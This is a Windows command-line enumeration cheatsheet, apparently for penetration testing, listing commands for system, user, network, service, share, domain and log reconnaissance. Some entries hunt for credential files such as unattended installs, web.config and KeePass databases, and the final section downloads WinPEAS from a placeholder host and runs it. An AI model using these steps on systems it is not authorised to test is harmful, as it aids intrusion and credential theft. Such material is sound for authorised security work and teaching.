Windows basic enumeration (cmd) cheatsheet:
System information:
hostname # Show the hostname of the machine
whoami # Show the current user
whoami /priv # List the current user's privileges
whoami /groups # List the current user's group memberships
systeminfo # Display OS, patch level, hostname etc
ver # Show the Windows version
echo %PROCESSOR_ARCHITECTURE% # Show system architecture
set # Display environment variables
Users and groups:
net user # List local user accounts
net user <username> # Show details for a specific local user
net localgroup # List local groups
net localgroup Administrators # Show members of the local Admin group
qwinsta # Displays info about sessions on a RDP
Networking:
ipconfig /all # Show network interfaces, IP, DNS, gateways
route print # Display the routing table
arp -a # Show ARP cache entries
netstat -ano # List active connections/ports with PIDs
nslookup localhost # Verify DNS resolution works
type C:\Windows\System32\drivers\etc\hosts # View local hostname mappings
Processes and Services:
tasklist # List running processes
tasklist /svc # Show processes and associated services
sc query # List services
sc qc <service> # Show service configuration details
wmic service get name,displayname,pathname,startmode # List services with executable paths
Scheduled tasks:
schtasks /query /fo LIST /v # List scheduled tasks with verbose details
Files and directories:
dir C:\ /a # List files, including hidden ones, in C:\
dir /s /b *.txt # Search for text files recursively
dir /s /b *.config # Search for config files recursively
dir /s /b *.ini # Search for INI files recursively
tree C:\Users /f # Show directory tree under Users
Interesting Files:
dir /s /b unattended.xml # Search for unattended installation files
dir /s /b sysprep.inf # Search for Sysprep files
dir /s /b sysprep.xml # Search for Sysprep XML files
dir /s /b web.config # Search for IIS and application config files
dir /s /b *.kdbx # Search for KeePass databases
Permissions and priveleges:
icacls C:\Users # View permissions on the Users directory
accesschk.exe -uwcqv "Authenticated Users" * # Check writable services/objects (AccessChk)
Shares:
net share # List local shared folders
net use # Show mapped network drives
net session # List active SMB sessions
Firewalls and antivirus:
netsh advfirewall show allprofiles # Show firewall status for all profiles
sc query windefend # Check Windows Defender service status
Domain Information:
set l # Check logon-related environment variables
nltest /dsgetdc:<domain> # Find a domain controller
net user /domain # List domain users
net group /domain # List domain groups
net group "Domain Admins" /domain # Show members of Domain Admins
Logs:
wevtutil qe System /c:20 /f:text # Show the last 20 System event log entries
wevtutil qe Security /c:20 /f:text # Show the last 20 Security event log entries
Winpeas:
curl http://<IP>/winPEASx64.exe --output winPEASx64.exe # Download WinPEAS
winPEASx64.exe # Run WinPEAS for automated enumeration